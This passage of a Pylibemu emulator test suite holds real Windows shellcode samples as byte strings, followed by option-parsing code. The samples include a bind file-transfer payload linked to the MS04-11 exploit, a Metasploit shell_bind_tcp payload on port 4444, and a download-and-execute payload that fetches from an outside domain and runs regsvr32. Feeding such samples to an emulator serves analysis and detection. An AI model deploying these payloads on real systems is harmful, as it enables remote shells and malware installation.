|..r%~x2a...V..h9| 1472 | shellcode += b"\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae\xb5\x71\xc4\x43\x1e" # |..~...6.....q.C.| 1473 | shellcode += b"\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f\x6c\x10\x8f\x68\x3d" # |4.:.7...\x.l..h=| 1474 | shellcode += b"\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc\x1a\xd9\x8f\xbe\x75" # |..Q..O.F.......u| 1475 | shellcode += b"\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc\x59\xf9\x8f\x47\x05" # |..V...S..4.Y..G.| 1476 | shellcode += b"\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67\xe6\x23\x62\x64\x7f" # |X.w..l.W..g.#bd.| 1477 | shellcode += b"\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7\x71\x3e\xe9\xcb\x22" # |.7.q.w.F...q>.."| 1478 | shellcode += b"\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35\x4c\x9f\x06\xc8\xc9" # |...F|.Q...5L....| 1479 | shellcode += 
b"\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64\x4a\xa6\x47\x64\x5a" # |..>.XS...WdJ.GdZ| 1480 | shellcode += b"\xa6\xfb\xe7\x7f\x9d\x25\xa5\x7f\xa6\x8d\xd6\x8c\x9d\xa0\x2d\x69" # |.....%........-i| 1481 | shellcode += b"\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f\xbd\x58\x2a\xde\x4e" # |2S....fL.._.X*.N| 1482 | shellcode += b"\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e\x4e\x0a\xd2\x67\x4d" # |..dL.._...~N..gM| 1483 | shellcode += b"\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60\xe6\x23\x51\xc8\xc9" # |.Q..fl.`3}`.#Q..| 1484 | shellcode += b"\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67\x40\xdc\xc8\xbe\xfe" # |.nS..gZ..ng@....| 1485 | shellcode += b"\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a\xe7\xb7\x28\xa4\x94" # |.@.......F...(..| 1486 | shellcode += b"\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8\x6c\xb1\xfb\xe1\x42" # |.<..^lE.F..l...B| 1487 | shellcode += b"\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66\xe6\x25\x6c\x9a\xc0" # |.VfH.n6H.Qf.%l..| 1488 | shellcode += b"\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7\x92\xa2\xf8\xb4\xdd" # |..d.#n..........| 1489 | shellcode += b"\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57\x4a\x0a\xd2\xc8\xc9" # |...K.._.;.WJ....| 1490 | shellcode += b"\xf5\x04\x37" # |..7| 1491 | 1492 | self.runShellcode(shellcode, 26) 1493 | 1494 | def testShellcode27(self): 1495 | """ 1496 | Windows bind filetransfer 0.0.0.0:38963 - tried to exploit DsRolerUpgradeDownlevelServer/MS04-11 1497 | """ 1498 | 1499 | shellcode = b"\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65" # |eeeeeeeeeeeeeeee| 1500 | shellcode += b"\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65" # |eeeeeeeeeeeeeeee| 1501 | shellcode += b"\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65" # |eeeeeeeeeeeeeeee| 1502 | shellcode += b"\x65\x65\x65\x65\x65\x65\xeb\x02\xeb\x6b\xe8\xf9\xff\xff\xff\x53" # |eeeeee...k.....S| 1503 | shellcode += b"\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x03\xd5" # |UVW.l$..E<.T.x..| 1504 | 
shellcode += b"\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x32\x49\x8b\x34\x8b\x03\xf5" # |.J..Z\x...2I.4...| 1505 | shellcode += b"\x33\xff\xfc\x33\xc0\xac\x3a\xc4\x74\x07\xc1\xcf\x0d\x03\xf8\xeb" # |3..3..:.t.......| 1506 | shellcode += b"\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b\x0c\x4b" # |.;|$.u..Z$..f..K| 1507 | shellcode += b"\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xeb\x02\x33\xc0\x5f\x5e" # |.Z..........3._^| 1508 | shellcode += b"\x5d\x5b\x89\x44\x24\x04\x8b\x04\x24\x89\x44\x24\x08\x8b\x44\x24" # |][.D$...$.D$..D$| 1509 | shellcode += b"\x04\x83\xc4\x08\xc3\x5e\x6a\x30\x59\x64\x8b\x19\x8b\x5b\x0c\x8b" # |.....^j0Yd...[..| 1510 | shellcode += b"\x5b\x1c\x8b\x1b\x8b\x7b\x08\x83\xec\x1c\x8b\xec\x33\xc0\x50\x68" # |[....{......3.Ph| 1511 | shellcode += b"\x2e\x65\x78\x65\x89\x65\x14\x57\x68\xea\x49\x8a\xe8\xff\xd6\x6a" # |.exe.e.Wh.I....j| 1512 | shellcode += b"\x06\xff\x75\x14\xff\xd0\x89\x45\x04\x57\x68\xdb\x8a\x23\xe9\xff" # |..u....E.Wh..#..| 1513 | shellcode += b"\xd6\x89\x45\x0c\x57\x68\x8e\x4e\x0e\xec\xff\xd6\x33\xc9\x66\xb9" # |..E.Wh.N....3.f.| 1514 | shellcode += b"\x6c\x6c\x51\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\xd0" # |llQh32.dhws2_T..| 1515 | shellcode += b"\x8b\xd8\x53\x68\xb6\x19\x18\xe7\xff\xd6\x89\x45\x10\x53\x68\xe7" # |..Sh.......E.Sh.| 1516 | shellcode += b"\x79\xc6\x79\xff\xd6\x89\x45\x18\x53\x68\x6e\x0b\x2f\x49\xff\xd6" # |y.y...E.Shn./I..| 1517 | shellcode += b"\x6a\x06\x6a\x01\x6a\x02\xff\xd0\x89\x45\x08\x33\xc0\x50\x50\x50" # |j.j.j....E.3.PPP| 1518 | shellcode += b"\xb8\x02\xff\x98\x33\x80\xf4\xff\x50\x8b\xc4\x6a\x10\x50\xff\x75" # |....3...P..j.P.u| 1519 | shellcode += b"\x08\x53\x68\xa4\x1a\x70\xc7\xff\xd6\xff\xd0\x58\x53\x68\xa4\xad" # |.Sh..p.....XSh..| 1520 | shellcode += b"\x2e\xe9\xff\xd6\x6a\x10\xff\x75\x08\xff\xd0\x33\xc0\x50\x50\xff" # |....j..u...3.PP.| 1521 | shellcode += b"\x75\x08\x53\x68\xe5\x49\x86\x49\xff\xd6\xff\xd0\x8b\x4d\x08\x89" # |u.Sh.I.I.....M..| 1522 | shellcode += 
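b"\x45\x08\x51\xff\x55\x18\x81\xc4\xfc\xfe\xff\xff\x8b\xdc\x33\xc9" # |E.Q.U.........3.|
        shellcode += b"\x51\xb1\xff\x51\x53\xff\x75\x08\xff\x55\x10\x85\xc0\x7e\x0a\x50" # |Q..QS.u..U...~.P|
        shellcode += b"\x53\xff\x75\x04\xff\x55\x0c\xeb\xe5\xff\x75\x08\xff\x55\x18\x57" # |S.u..U....u..U.W|
        shellcode += b"\x68\x5b\x4c\x1a\xdd\xff\xd6\xff\x75\x04\xff\xd0\x33\xc0\x50\xff" # |h[L.....u...3.P.|
        shellcode += b"\x75\x14\x57\x68\x98\xfe\x8a\x0e\xff\xd6\xff\xd0\x57\x68\xef\xce" # |u.Wh........Wh..|
        shellcode += b"\xe0\x60\xff\xd6\xff\xd0\x65\x65\x65\x65" # |.`....eeee|

        self.runShellcode(shellcode, 27)

    def testShellcode28(self):
        """
        windows/shell_bind_tcp AutoRunScript=, EXITFUNC=process, InitialAutoRunScript=,
        LPORT=4444, RHOST= http://www.metasploit.com
        """

        shellcode = b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
        shellcode += b"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
        shellcode += b"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
        shellcode += b"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
        shellcode += b"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
        shellcode += b"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
        shellcode += b"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
        shellcode += b"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
        shellcode += b"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
        shellcode += b"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
        shellcode += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
        shellcode += b"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
        shellcode += b"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
        shellcode += b"\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68"
        shellcode += b"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
        shellcode += b"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
        shellcode += b"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
        shellcode += b"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
        shellcode += b"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
        shellcode += b"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
        shellcode += b"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56"
        shellcode += b"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
        shellcode += b"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"

        self.runShellcode(shellcode, 28)

    def testShellcode29(self):
        """
        Sample 29: origin and generator options are not recorded in this
        suite. (Docstring added so that ``-i 29`` prints this text instead
        of failing on a missing description.)
        """

        shellcode = b'\x90\x90\x90\x90\x90\x90\x90\x90\xe9\x36\x01\x00\x00\x5f\x64\xa1\x30\x00'
        shellcode += b'\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x20\x80\x7d\x0c\x33\x74\x03'
        shellcode += b'\x96\xeb\xf3\x8b\x68\x08\x8b\xf7\x6a\x05\x59\xe8\xca\x00\x00\x00\xe2\xf9'
        shellcode += b'\xe8\x00\x00\x00\x00\x58\x50\x6a\x40\x68\xff\x00\x00\x00\x50\x83\xc0\x19'
        shellcode += b'\x50\x55\x8b\xec\x8b\x5e\x10\x83\xc3\x05\xff\xe3\x68\x6f\x6e\x00\x00\x68'
        shellcode += b'\x75\x72\x6c\x6d\x54\xff\x16\x8b\xe8\xe8\x96\x00\x00\x00\x8b\xd7\x47\x80'
        shellcode += b'\x3f\x00\x75\xfa\x47\x57\x47\x80\x3f\x00\x75\xfa\x8b\xef\x5f\x33\xc9\x81'
        shellcode += b'\xec\x10\x01\x00\x00\x8b\xdc\x83\xc3\x0c\x51\x52\x53\x68\x04\x01\x00\x00'
        shellcode += b'\xff\x56\x0c\x5a\x59\x51\x52\x8b\x02\x53\x43\x80\x3b\x00\x75\xfa\x81\x7b'
        shellcode += b'\xfc\x2e\x64\x6c\x6c\x75\x03\x83\xeb\x08\x89\x03\xc7\x43\x04\x2e\x64\x6c'
        shellcode += b'\x6c\xc6\x43\x08\x00\x5b\x8a\xc1\x04\x30\x88\x45\x00\x33\xc0\x50\x50\x53'
        shellcode += b'\x57\x50\xff\x56\x14\x83\xf8\x00\x75\x1d\x6a\x01\x83\xeb\x0c\xc7\x03\x72'
        shellcode += b'\x65\x67\x73\xc7\x43\x04\x76\x72\x33\x32\xc7\x43\x08\x20\x2d\x73\x20\x53'
        shellcode += b'\xff\x56\x04\x5a\x59\x83\xc2\x04\x41\x80\x3a\x00\x90\x90\x90\x75\x9a\xff'
        shellcode += b'\x56\x08\x51\x56\x8b\x75\x3c\x8b\x74\x35\x78\x03\xf5\x56\x8b\x76\x20\x03'
        shellcode += b'\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe\x10\x38\xf2\x74\x08\xc1'
        shellcode += b'\xcb\x0d\x03\xda\x40\xeb\xf1\x3b\x1f\x75\xe7\x5e\x8b\x5e\x24\x03\xdd\x66'
        shellcode += b'\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8'
        shellcode += b'\xc5\xfe\xff\xff\x8e\x4e\x0e\xec\x98\xfe\x8a\x0e\x7e\xd8\xe2\x73\x33\xca'
        shellcode += b'\x8a\x5b\x1b\xc6\x46\x79\x36\x1a\x2f\x70\x63\x71\x4d\x46\x00\x68\x74\x74'
        shellcode += b'\x70\x3a\x2f\x2f\x6b\x69\x61\x6a\x6d\x6b\x6a\x6b\x79\x74\x6e\x2e\x63\x6f'
        shellcode += b'\x6d\x2f\x6e\x74\x65\x2f\x67\x6e\x68\x31\x31\x2e\x70\x79\x2f\x79\x48\x35'
        shellcode += b'\x33\x32\x36\x38\x36\x62\x39\x56\x30\x31\x30\x30\x66\x30\x36\x30\x30\x30'
        shellcode += b'\x36\x52\x33\x64\x37\x30\x38\x66\x62\x31\x31\x30\x32\x54\x31\x65\x37\x61'
        shellcode += b'\x37\x66\x32\x31\x32\x30\x33\x6c\x30\x30\x30\x63\x33\x32\x39\x00\x00'

        self.runShellcode(shellcode, 29)


def usage():
    """Print the command-line help to stdout and exit with status 0."""
    sys.stdout.write("""
Pylibemu test suite

Usage:
    python sctest.py [ options ]

Options:
    -h , --help             Display this help information.
    -s , --shellcode=       Execute the selected shellcode test (0 means 'all tests')
    -i , --info=            Shows information about the selected shellcode test

""")
    sys.exit(0)


def _parse_index(value):
    """Return the test index given on the command line as an int.

    A value that is not an integer is reported on stderr and the process
    exits with status 1, rather than leaking a ValueError traceback from
    the bare ``int(option[1])`` the loop below used to do.
    """
    try:
        return int(value)
    except ValueError:
        sys.stderr.write("Invalid shellcode test index: %r\n" % (value,))
        sys.exit(1)


def _select_test(sctest, index):
    """Return the bound ``testShellcode<index>`` method of *sctest*.

    When no such method exists the index is reported on stderr and the
    process exits with status 1; previously ``getattr(..., None)`` handed
    ``None`` to the caller, which then failed with a TypeError on ``f()``
    or ``f.__doc__ + '\\n'``.
    """
    f = getattr(sctest, "testShellcode%i" % (index,), None)
    if f is None:
        sys.stderr.write("No such shellcode test: %i\n" % (index,))
        sys.exit(1)
    return f


if __name__ == '__main__':
    args = sys.argv[1:]
    try:
        options, args = getopt.getopt(args, 'hs:i:',
                                      ['help', 'shellcode=', 'info=', ])
    except getopt.GetoptError:
        usage()

    if not options and not args:
        usage()

    sctest = ShellcodeTest()
    execute = False
    info = False
    # Selected test method; the last -s/-i option seen wins, as before.
    f = None

    for option, value in options:
        if option in ('-h', '--help'):
            usage()
        if option in ('-s', '--shellcode'):
            # NOTE(review): usage() advertises 0 as 'all tests', but nothing
            # visible here implements that for -s; an index with no matching
            # test method now exits with a message instead of a TypeError.
            f = _select_test(sctest, _parse_index(value))
            execute = True
        if option in ('-i', '--info'):
            index = _parse_index(value)
            if index == 0:
                usage()
            f = _select_test(sctest, index)
            info = True

    if info:
        # Not every test method carries a docstring; fall back to a fixed
        # message rather than failing on ``None + '\n'``.
        sys.stdout.write((f.__doc__ or "No description available for this test.") + '\n')
    if execute:
        f()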
